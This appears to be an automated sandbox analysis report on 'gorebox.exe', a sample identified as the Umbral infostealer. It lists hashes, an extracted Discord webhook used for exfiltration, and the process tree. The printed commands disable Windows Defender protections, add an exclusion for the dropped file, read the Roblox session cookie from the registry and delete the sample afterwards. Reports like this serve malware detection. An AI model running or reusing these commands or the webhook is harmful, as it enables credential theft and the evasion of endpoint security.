Analysis
-
max time kernel
12s -
max time network
16s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
01-12-2024 09:26
Static task
static1
General
-
Target
gorebox.exe
-
Size
431KB
-
MD5
4522fc4ba239805a83c7209452595423
-
SHA1
1a57d4e9a57bc7ef167d01928afeeab07bbd25c5
-
SHA256
7bef7c9f99847e7c368be124992565c4bcd089948d5b1ca1d1c46911c625a5b1
-
SHA512
a60cca224cfa06659089682637493f968c7de035b3aabcfb224eda4e50873d0c2198f9797a5acf28b7e92ea71ff246aed616fd8ce56d787679f54b6bfcee31cd
-
SSDEEP
6144:DahOl8p0yN90QEvNIPbKK6lyO0YYO/2IKuaiTPH2g9mfCImdp2vg0FM:DiKty90tyTK5T0YYdIKoCgkfdmP
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1312707054921842768/isqncLMa7kda5iILpNOk1bl-iVzctRU9oXMRs4eMThSQUfAbARPXl6CGuwMfCK3fZjSE
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x002800000004519a-7.dat family_umbral behavioral1/memory/1092-10-0x000001E067790000-0x000001E0677DA000-memory.dmp family_umbral -
Umbral family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3652 powershell.exe 8 powershell.exe 1856 powershell.exe 2560 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts gorerrrr.exe -
Executes dropped EXE 2 IoCs
pid Process 1460 GoreBox.exe 1092 gorerrrr.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" gorebox.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 23 discord.com 24 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 ip-api.com -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2112 cmd.exe 472 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1984 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 472 PING.EXE -
Suspicious behavior: EnumeratesProcesses 31 IoCs
pid Process 3028 wmic.exe 3028 wmic.exe 3028 wmic.exe 3028 wmic.exe 1092 gorerrrr.exe 3652 powershell.exe 3652 powershell.exe 8 powershell.exe 8 powershell.exe 1856 powershell.exe 1856 powershell.exe 2032 powershell.exe 2032 powershell.exe 5092 wmic.exe 5092 wmic.exe 5092 wmic.exe 5092 wmic.exe 3780 wmic.exe 3780 wmic.exe 3780 wmic.exe 3780 wmic.exe 2808 wmic.exe 2808 wmic.exe 2808 wmic.exe 2808 wmic.exe 2560 powershell.exe 2560 powershell.exe 1984 wmic.exe 1984 wmic.exe 1984 wmic.exe 1984 wmic.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1092 gorerrrr.exe Token: SeIncreaseQuotaPrivilege 3028 wmic.exe Token: SeSecurityPrivilege 3028 wmic.exe Token: SeTakeOwnershipPrivilege 3028 wmic.exe Token: SeLoadDriverPrivilege 3028 wmic.exe Token: SeSystemProfilePrivilege 3028 wmic.exe Token: SeSystemtimePrivilege 3028 wmic.exe Token: SeProfSingleProcessPrivilege 3028 wmic.exe Token: SeIncBasePriorityPrivilege 3028 wmic.exe Token: SeCreatePagefilePrivilege 3028 wmic.exe Token: SeBackupPrivilege 3028 wmic.exe Token: SeRestorePrivilege 3028 wmic.exe Token: SeShutdownPrivilege 3028 wmic.exe Token: SeDebugPrivilege 3028 wmic.exe Token: SeSystemEnvironmentPrivilege 3028 wmic.exe Token: SeRemoteShutdownPrivilege 3028 wmic.exe Token: SeUndockPrivilege 3028 wmic.exe Token: SeManageVolumePrivilege 3028 wmic.exe Token: 33 3028 wmic.exe Token: 34 3028 wmic.exe Token: 35 3028 wmic.exe Token: 36 3028 wmic.exe Token: SeIncreaseQuotaPrivilege 3028 wmic.exe Token: SeSecurityPrivilege 3028 wmic.exe Token: SeTakeOwnershipPrivilege 3028 wmic.exe Token: SeLoadDriverPrivilege 3028 wmic.exe Token: SeSystemProfilePrivilege 3028 wmic.exe Token: SeSystemtimePrivilege 3028 wmic.exe Token: SeProfSingleProcessPrivilege 3028 wmic.exe Token: SeIncBasePriorityPrivilege 3028 wmic.exe Token: SeCreatePagefilePrivilege 3028 wmic.exe Token: SeBackupPrivilege 3028 wmic.exe Token: SeRestorePrivilege 3028 wmic.exe Token: SeShutdownPrivilege 3028 wmic.exe Token: SeDebugPrivilege 3028 wmic.exe Token: SeSystemEnvironmentPrivilege 3028 wmic.exe Token: SeRemoteShutdownPrivilege 3028 wmic.exe Token: SeUndockPrivilege 3028 wmic.exe Token: SeManageVolumePrivilege 3028 wmic.exe Token: 33 3028 wmic.exe Token: 34 3028 wmic.exe Token: 35 3028 wmic.exe Token: 36 3028 wmic.exe Token: SeDebugPrivilege 3652 powershell.exe Token: SeIncreaseQuotaPrivilege 3652 powershell.exe Token: SeSecurityPrivilege 3652 powershell.exe Token: SeTakeOwnershipPrivilege 3652 powershell.exe Token: SeLoadDriverPrivilege 3652 powershell.exe Token: SeSystemProfilePrivilege 3652 powershell.exe Token: SeSystemtimePrivilege 3652 powershell.exe Token: SeProfSingleProcessPrivilege 3652 powershell.exe Token: SeIncBasePriorityPrivilege 3652 powershell.exe Token: SeCreatePagefilePrivilege 3652 powershell.exe Token: SeBackupPrivilege 3652 powershell.exe Token: SeRestorePrivilege 3652 powershell.exe Token: SeShutdownPrivilege 3652 powershell.exe Token: SeDebugPrivilege 3652 powershell.exe Token: SeSystemEnvironmentPrivilege 3652 powershell.exe Token: SeRemoteShutdownPrivilege 3652 powershell.exe Token: SeUndockPrivilege 3652 powershell.exe Token: SeManageVolumePrivilege 3652 powershell.exe Token: 33 3652 powershell.exe Token: 34 3652 powershell.exe Token: 35 3652 powershell.exe -
Suspicious use of WriteProcessMemory 30 IoCs
description pid Process procid_target PID 4472 wrote to memory of 1460 4472 gorebox.exe 83 PID 4472 wrote to memory of 1460 4472 gorebox.exe 83 PID 4472 wrote to memory of 1092 4472 gorebox.exe 84 PID 4472 wrote to memory of 1092 4472 gorebox.exe 84 PID 1092 wrote to memory of 3028 1092 gorerrrr.exe 85 PID 1092 wrote to memory of 3028 1092 gorerrrr.exe 85 PID 1092 wrote to memory of 4812 1092 gorerrrr.exe 88 PID 1092 wrote to memory of 4812 1092 gorerrrr.exe 88 PID 1092 wrote to memory of 3652 1092 gorerrrr.exe 90 PID 1092 wrote to memory of 3652 1092 gorerrrr.exe 90 PID 1092 wrote to memory of 8 1092 gorerrrr.exe 93 PID 1092 wrote to memory of 8 1092 gorerrrr.exe 93 PID 1092 wrote to memory of 1856 1092 gorerrrr.exe 95 PID 1092 wrote to memory of 1856 1092 gorerrrr.exe 95 PID 1092 wrote to memory of 2032 1092 gorerrrr.exe 97 PID 1092 wrote to memory of 2032 1092 gorerrrr.exe 97 PID 1092 wrote to memory of 5092 1092 gorerrrr.exe 101 PID 1092 wrote to memory of 5092 1092 gorerrrr.exe 101 PID 1092 wrote to memory of 3780 1092 gorerrrr.exe 103 PID 1092 wrote to memory of 3780 1092 gorerrrr.exe 103 PID 1092 wrote to memory of 2808 1092 gorerrrr.exe 106 PID 1092 wrote to memory of 2808 1092 gorerrrr.exe 106 PID 1092 wrote to memory of 2560 1092 gorerrrr.exe 108 PID 1092 wrote to memory of 2560 1092 gorerrrr.exe 108 PID 1092 wrote to memory of 1984 1092 gorerrrr.exe 110 PID 1092 wrote to memory of 1984 1092 gorerrrr.exe 110 PID 1092 wrote to memory of 2112 1092 gorerrrr.exe 112 PID 1092 wrote to memory of 2112 1092 gorerrrr.exe 112 PID 2112 wrote to memory of 472 2112 cmd.exe 114 PID 2112 wrote to memory of 472 2112 cmd.exe 114 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4812 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\gorebox.exe"C:\Users\Admin\AppData\Local\Temp\gorebox.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4472 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\GoreBox.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\GoreBox.exe2⤵
- Executes dropped EXE
PID:1460
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\gorerrrr.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\gorerrrr.exe2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1092 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3028
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\gorerrrr.exe"3⤵
- Views/modifies file attributes
PID:4812
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\gorerrrr.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3652
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:8
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1856
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2032
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5092
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3780
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2808
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2560
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
- Suspicious behavior: EnumeratesProcesses
PID:1984
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\gorerrrr.exe" && pause3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Windows\system32\PING.EXEping localhost4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:472
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Modify Registry
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53eb3833f769dd890afc295b977eab4b4
SHA1e857649b037939602c72ad003e5d3698695f436f
SHA256c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
-
Filesize
1KB
MD560b3262c3163ee3d466199160b9ed07d
SHA1994ece4ea4e61de0be2fdd580f87e3415f9e1ff6
SHA256e3b30f16d41f94cba2b8a75f35c91ae7418465abfbfe5477ec0551d1952b2fdb
SHA512081d2015cb94477eb0fbc38f44b6d9b4a3204fb3ad0b7d0e146a88ab4ab9a0d475207f1adae03f4a81ccc5beb7568dc8be1249f69e32fe56efd9ee2f6ee3b1af
-
Filesize
948B
MD5c5863331e1077e9059593bb11af4e3ff
SHA1eded7cd11db222a763960b502afd1ce758816af2
SHA25691f6e903e52e2fd1583b34f7c288bcaba0327e458dfa805e982176962a4ff60a
SHA512d93aa719ce89a25a73652d2163e2bf2a53b8b0579c3ce6f03b1d972aceac684e8cc22477ea7901f6d76b87d405e16621df2a612f5360d2aac63694d3f34a03fa
-
Filesize
1KB
MD5494de073067224860ddfa87f20c1fcd5
SHA1139fe0d6cc741fdbb891b5e0df6e236fcdfdd7de
SHA2565b67e54cbb8566db2c781ed86c2e026bef8e1c6e5b454c42872ffba7782a9579
SHA5122457bb775ad7ce2b62b35f5cddfab1c1e1b16dcba83e38e7b5fb2e205048ffc5d220a29a9b0cfe218800d46fc3888480a0822877cf392aeadcf9287b784a390a
-
Filesize
1KB
MD571942225419386ac509d153f679d4a68
SHA1b2e1b1cba65e2a0b1b231a5a8b085e5b5294bbb3
SHA256bc4f5ba67c4a53622f5618f2998a6c5c422daeea4a697f393d2a6667c4ab878b
SHA5124195908338bee9870b0bbf29351b218a6e73da4d86073e148e128a0fa0269698ff1af0e1c4bc6b9ac3d2b2c4da23ead5acc6d0eb5c26a6095bf31b4491042912
-
Filesize
651KB
MD55b23e32cdf5236587cf71ce4b5f001a6
SHA1f9ab18bb610b5e999320e422f4fffd05ed08209a
SHA25611cfef86247a1725b6ac0ad49bb40217d6758c2fae04041f7aa1b73c68795d72
SHA51282859dc2637ec91af549cb402afafc1a2f09c73b7046eecaf81b366abd7b003f74f12b50b198ed79e49beb56f1117e2b9164d05bd9a650858db80075d39fee42
-
Filesize
272KB
MD5e1b7b9efc6568dae97cc07ef9091a202
SHA1ce3b24b39626d18e2f9098deb353519d31e8018d
SHA25619877af49af352c9430fb6fb3fb08aabfc4692c0dcf225cd8d71f8503d01891e
SHA512b79989e692e067953a83346d3fdf6e155b4f96dd27823c220a4e0e77cf599d46ea52fbd458e1b968255226bbd89e99c8e776b90a92663f311dd533e672cf6996
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82